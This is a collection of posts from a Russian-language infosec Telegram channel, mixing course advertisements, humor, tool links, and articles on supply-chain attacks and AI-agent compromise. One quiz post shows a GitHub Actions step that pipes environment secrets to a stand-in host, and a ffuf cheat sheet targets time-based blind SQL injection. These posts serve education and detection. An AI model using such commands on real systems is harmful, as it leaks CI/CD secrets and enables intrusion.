Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность

🗺 Как DPI распознаёт MTProto-прокси Полезный технический разбор про то, почему одной маскировки под TLS уже недостаточно. В статье объясняют:

— как работает Fake-TLS в MTProto; — почему JA3/JA4 fingerprint помогает находить неидеальный TLS; — как DPI анализирует размеры пакетов, тайминги и keep-alive; — почему зашифрованный payload всё равно оставляет сетевые метаданные; — где упирается предел DPI из-за стоимости глубокого анализа.

🔗 Читать подробнее 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

😎 Знакомьтесь с экспертом Proglib.academy: Senior Software Engineer и Team Lead в Yandex Cloud Роман Барлос Роман — консультант нашего курса «Разработка ИИ-агентов». Он работает на стыке cloud-native архитектуры и AI, активно внедряя современные ИИ-подходы в реальные процессы разработки. За что его ценит IT-комьюнити? 🟣 Team Lead и AI-евангелист в команде UX Yandex Cloud

14-лет в разработке. Занимается AI-адопшеном в команде Yandex Cloud, проводит мастер-классы и продвигает лучшие практики для повышения эффективности разработчиков.

🟣 Техлид Sourcecraft Code Assistant

С сильным практическим бэкграундом принимал участие как технический лид в создании мощного AI-расширения для VS Code.

🟣 Создатель полезного Open Source

Разрабатывает утилиты, которые позволяют быстро начать эксперименты с инференсом и агентами в локальном окружении: например, набор скриптов vllm-setup для быстрого запуска окружения и mini-proxy — минималистичный прокси для OpenAI API провайдеров.

🟣 Автор интерактивных ML-визуализаций

Объясняет сложные концепции наглядно. Создал серию залипательных обучающих материалов, где можно вживую пощупать работу сетей Хопфилда, машин Больцмана и VC-размерности.

Роман регулярно делится инженерными наработками, инсайтами и экспертизой в своем авторском Telegram-канале На курсе Роман выступает консультантом программы: он помогает формировать содержание уроков с опорой на актуальные инженерные практики и жесткие требования индустрии. Узнать больше о программе и разработке автономных систем: 👉 Курс «Разработка ИИ-агентов» Так, продолжаем знакомить вас с командой? 👍 — Да, ждем новых лиц 🔥 — Жду полезные материалы от Романа

Как заплачено, так и нафигачено! 🤪 🐸 Библиотека хакера #hack_humor

🐧 Шпаргалка по работе с утилитой cron и правам для файлов в Linux: на заметку этичному хакеру 🔹 Курс «Алгоритмы и структуры данных» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

💡 Крупнейший каталог OSINT-инструментов В каталоге собрано более 1300 инструментов, разбитых на десятки категорий:

— Telegram — Социальные сети — Email и Username Search — Геолокация — Анализ доменов и IP — Утечки данных — Metadata Analysis — Threat Intelligence

➡️ Что удобно: — поиск по инструментам; — автоматическое обновление из GitHub; — более 50 категорий; — веб-версия, Android и desktop-клиент. Полезная закладка для OSINT-специалистов, расследователей, багхантеров и пентестеров. 🔗 Ссылка 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

🧩 Хакер-челлендж Сценарий: в open source-репозиторий прилетает pull request с “безобидным” изменением GitHub Actions workflow. Внутри добавили шаг:

- name: Debug publish   run: |     env | base64 | curl -s -X POST https://example[.]com/logs -d @-

Автор PR пишет:

«Оптимизировал publish pipeline и добавил debug output для диагностики релизов».

❓ Что здесь нужно проверять в первую очередь? Голосуйте эмодзи: 🔥 — Exfiltration of CI/CD secrets: workflow пытается вывести переменные окружения и секреты наружу. 👾 — Dependency confusion: пакет подтягивается из внешнего registry. ❤️ — Cache poisoning: атакующий подменяет build cache. 👍 — Path traversal: workflow читает файлы за пределами проекта. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #ctf_challenge

⚡️ Продолжаем знакомить вас с экспертами курса AgentOps! — Сергей Нотевский расскажет, как выстроить FinOps для AI-продуктов: оптимизировать затраты на разработку и продакшен, внедрить model routing, semantic cache и систему алертов для контроля расходов — Эмиль Сатаев разберет Context Engineering: управление контекстом, защиту от prompt injection, работу с длинными контекстами и построение безопасного пайплайна входа для AI-систем — Михаил Бондаревский покажет, как подготовить инфраструктуру для AI-агентов: Docker, sandboxing, streaming, docker-compose и воспроизводимое окружение для разработки и продакшена — Мурат Хажгериев расскажет про Enterprise Integrations & MCP: когда MCP действительно нужен, как подключать внешние сервисы и реализовывать интеграции с OAuth2 delegation — Герман Сабиров разберет Governance & Compliance для AI-систем: data flow, audit logs, требования 152-ФЗ, локализацию данных и построение compliance-подхода на уровне архитектуры Курс для backend-разработчиков, тимлидов и LLM инженеров о том, как внедрять AI-логику в бэкенд IT-продуктов и сохранять стабильность сервиса. 👉 Изучить обновленную программу AgentOps и занять место.

💻 Практика атак на Kubernetes Kubernetes Goat — это специально уязвимый Kubernetes-кластер для обучения безопасности на практике. ➡️ Что внутри: — ошибки RBAC и лишние привилегии — уязвимые контейнеры — небезопасные настройки кластера — privilege escalation — container escape — практические сценарии для Red Team и Blue Team Отличная площадка для изучения атак на Kubernetes в безопасной среде ✅ 🔗 Ссылка на GitHub 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #tool_of_the_week

Подрядчик подключился к вашей системе. Работу сделал. Доступ остался. Знакомая ситуация? В какой-то момент становится сложно ответить на простой вопрос, кто сейчас вообще подключен к вашим ИТ-ресурсам и что там делает. Именно в таких сценариях чаще всего начинаются проблемы. Доступы выдаются быстро, а потом про них забывают. Контроль снижается, а одной ошибки или компрометации бывает достаточно, чтобы затронуть важные для компании системы. В канале Индид вы найдете материалы о том, как выстраивать защиту учетных данных, снижать риски инцидентов и всегда держать доступ к инфраструктуре под контролем. В нем вы сможете забрать гайд по работе с подрядчиками. Внутри: 📍 Ключевые риски ИБ при работе с подрядчиками 📍 Способы атак злоумышленников и их последствия 📍 Меры безопасности, регламентирующие получение прав доступа Подписывайтесь на канал Индид, чтобы регулярно читать практические материалы о защите доступа. #реклама О рекламодателе

Они прогрессируют, уже пытаются маскироваться под людей 🔹 Курс разработка AI-агентов 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #небагафича

⚡️ Blind SQLi через время ответа в ffuf При поиске Blind SQL Injection не всегда есть ошибки в ответе приложения. Иногда единственный признак — увеличение времени ответа. Команда для поиска параметров с задержкой:

  -w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt \
  -fc 404 \
  -mt 5000

🈂️ -mt 5000 — покажет только ответы дольше 5 секунд 🈂️ Задержка может указывать на time-based Blind SQLi 🈂️ Удобно для первичного скрининга параметров без ручной проверки ⚠️ Не забывайте исключать ложные срабатывания из-за медленных API, rate limiting и сетевых задержек. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #cheat_sheet

🛣 Penetration Testing Roadmap — коллекция ресурсов, сертификатов, инструментов и методологий, которые помогут вам стать экспертом в области пентеста. 👉 GitHub & Сайт 🔹 Курс «Алгоритмы и структуры данных» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

🔥 Автоматизация пентеста через AI-агентов Pentest Swarm AI агенты обмениваются находками между собой и самостоятельно выбирают следующие шаги атаки на основе уже собранных данных. Что умеет: 🔘 Поиск поддоменов 🔘 Сканирование портов 🔘 Поиск уязвимостей 🔘 Эксплуатация находок 🔘 Генерация отчётов Есть готовые сценарии для Bug Bounty, CTF и анализа внешней поверхности атаки. 🔗 GitHub 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #tool_of_the_week

⚡️ Последний шанс забрать курсы со СКИДКОЙ 40%! Прокачайте свой мозг правильно До конца акции вы можете воспользоваться специальными ценами на самые востребованные IT-направления. Круто и выгодно прокачать свои скиллы, чтобы получить оффер, уехать на Бали и больше не быть онлайн 😎 ➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽) Курс про контролируемую разработку ИИ-агентов: качество, стоимость, наблюдаемость и тестирование. С первого занятия — только практическая работа. ➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽) Профессиональный трек для разработчиков и LLM инженеров о том, как правильно внедрять AI-логику в бэкенд и сохранять железную стабильность сервиса. ➡️ Математика для Data Science — от 29 990 ₽ (вместо 39 990 ₽) Вы научитесь решать сложные математические задачи, которые дают на собеседованиях на позицию дата-сайентиста в бигтехе. Отличная база для мощного старта в DS. ➡️ Курс Специалист по ИИ — 89 000 ₽ (вместо 113 900 ₽) Комплексная программа для получения профессии в сфере ИИ с нуля. За 8 месяцев вы соберете сильное портфолио из 5 реальных проектов и дипломной работы. ➡️ Архитектуры и шаблоны проектирования — 27 990 ₽ (вместо 37 900 ₽) Интенсив для разработчиков, который поможет освоить основные паттерны проектирования и прокачать навыки архитектора программного обеспечения. 🌸 Выбирайте направление, оставляйте заявку на сайте распродажи, и наш менеджер подробно вас проконсультирует

🔑 Топ-4 механизма аутентификации Эти архитектуры уберегут вас от фатальных дыр в безопасности при настройке серверов, интеграции сторонних сервисов или проектировании баз данных. 🛡 Главные инструменты проверки:

1. Ключи SSH: Криптографическая пара из публичного и приватного ключей. Публичный лежит на сервере, приватный — у вас. Идеально подходит для безопасного беспарольного доступа к серверам и Git-репозиториям. 2. Токены OAuth: Временные цифровые пропуска, которые выдает сервер авторизации. Нужны для того, чтобы сторонние приложения могли получить ограниченный доступ к вашим данным (например, «войти через Google»), вообще не зная вашего реального пароля. 3. Сертификаты SSL: Цифровые паспорта для сайтов. Они подтверждают, что сервер принадлежит именно тому домену, на который вы зашли, и обеспечивают безопасное зашифрованное HTTPS-соединение. 4. Учетные данные: Классическая связка «логин + пароль». Данные пользователя отправляются по защищенному каналу на сервер, где пароль хэшируется и сверяется с базой данных. Самый старый, понятный, но и самый уязвимый из-за человеческого фактора метод.

🔹 Практический интенсив «Архитектуры и шаблоны проектирования» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #ликбез

📌 580+ команд для пентестера Внутри собраны команды по основным направлениям:

— Recon & Enumeration
— Active Directory
— Web Security
— Privilege Escalation
— Pivoting & Tunneling
— Post Exploitation
— Linux и Windows

Все команды разбиты по категориям и доступны через удобный интерфейс в стиле терминала ⚡️ 🔵 Подойдёт для: — OSCP / OSEP подготовки; — CTF; — лабораторий; — внутренних пентестов; — быстрого поиска команд во время работы. 📎 Ссылка 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #cheat_sheet

🦾🧠🏋️ Качаем мозги к лету! Все готовятся к пляжному сезону, а мы предлагаем прокачать хард-скилы, чтобы забрать крутой оффер, строить продукты будущего и работать из любой точки мира 😎 ⚡️ Распродажа @proglib_academy: забирайте самые актуальные образовательные треки по сниженным ценам! ➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽). ➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽). ➡️ Математика для разработки AI-моделей — 23 990 ₽ (вместо 31 990 ₽). ➡️ ML для старта в Data Science — 28 990 ₽ (вместо 38 990 ₽). Почему мы? ⭐️Учим для продакшена. Наши программы заточены под реальные задачи бизнеса: как не слить бюджет на токены, как заставить LLM работать стабильно в бэкенде и как выстроить отказоустойчивую архитектуру. ⭐️Спикеры — суровые практики. Вы будете перенимать опыт у действующих AI-архитекторов, тимлидов и ML-инженеров из топовых IT-компаний. ⭐️Комплексный подход. Мы даем как мощный математический фундамент для понимания моделей «под капотом», так и передовые инструменты оркестрации агентов. ⭐️Много практики и фидбека. Вебинары, десятки практических заданий и живое общение с экспертами в чате Telegram на протяжении всего обучения. ⏳ Оставляйте заявку и бронируйте место со СКИДКОЙ 40%

📌 Подборка статей по теме Supply Chain атак через инструменты разработчика Собрали топовые материалы: от разбора конкретных инцидентов до техник защиты. ➖ Отравленное расширение VS Code привело к взлому GitHub, и Microsoft владеет каждым звеном этой цепи — полная анатомия атаки: как троянизированный Nx Console (2.2M установок) за 18 минут привёл к краже 3 800 внутренних репозиториев GitHub. Лучший разбор инцидента. ➖ Технический deep dive в пейлоад Nx Console — StepSecurity — multi-stage credential stealer: сбор токенов из GitHub/npm/AWS/Vault/K8s/1Password, DNS-туннелирование, persistence через GitHub Search API как dead-drop, поддельная Sigstore-аттестация для публикации «легитимных» пакетов. ➖ Ликвидация инфраструктуры GlassWorm: разрушение supply chain атак на VS Code, npm, Python и GitHub — как CrowdStrike, Google и Shadowserver 26 мая одновременно уничтожили все C2-каналы ботнета. 35 000+ заражённых установок, 300+ отравленных репозиториев с начала 2025. ➖ Вредоносный npm-пакет крадёт файлы из рабочей директории Claude AI — пакет mouse5212-super-formatter, написанный с помощью ИИ, таргетит /mnt/user-data. Автор слил свой же GitHub-токен в код. ➖ Как закрепить версии расширений VS Code для защиты от supply chain атак — практический гайд: pinning версий в devcontainers, отключение автообновления, проверка publisher identity. ➖ Утечка исходного кода GitHub: причиной стало вредоносное расширение для VS Code — подробный русскоязычный разбор: механика червя Mini Shai-Hulud, инфраструктура C2 через «мёртвые» репозитории, демон kitty-monitor, аварийный переключатель по ключевому слову «firedalazer». ➖ Вы пустили ИИ-агента в репозиторий — теперь разбираемся, что он может сломать — кража SSH-ключей через Claude Code, эксфильтрация через DNS-запросы в обход allowlist, компрометация CI/CD → cloud admin за 72 часа через OIDC. ➖ Черви в расширениях VS Code: новая угроза для разработчиков — как вредоносные расширения используют децентрализованные C2, обфускацию и легитимные репозитории. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

🐸 Библиотека хакера #hack_humor

Если вы думаете, что ваш провайдер медленный, вспомните парней из Норвегии. В 2001 году группа пользователей Linux из Бергена решила на практике проверить шуточный протокол IP over Avian Carriers (RFC 1149). Результаты легендарного эксперимента:

- Дистанция: 5 км. - Пакеты: 9 ICMP-запросов (пингов), привязанных к лапкам голубей. - Потери: До финиша добрались только 4 ответа. Пакет лосс составил солидные 55,6%. - Задержка: От 53 минут до 1 часа 40 минут.

А какой был ваш самый «медленный» опыт работы с сетью? ❤️ — 56 кбит/с 🔥 — Спутник в глуши 🙏 — Раздача с телефона в подвале (одна палочка EDGE и бесконечное ожидание) 🔹 Курс разработка AI-агентов 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #режимразраба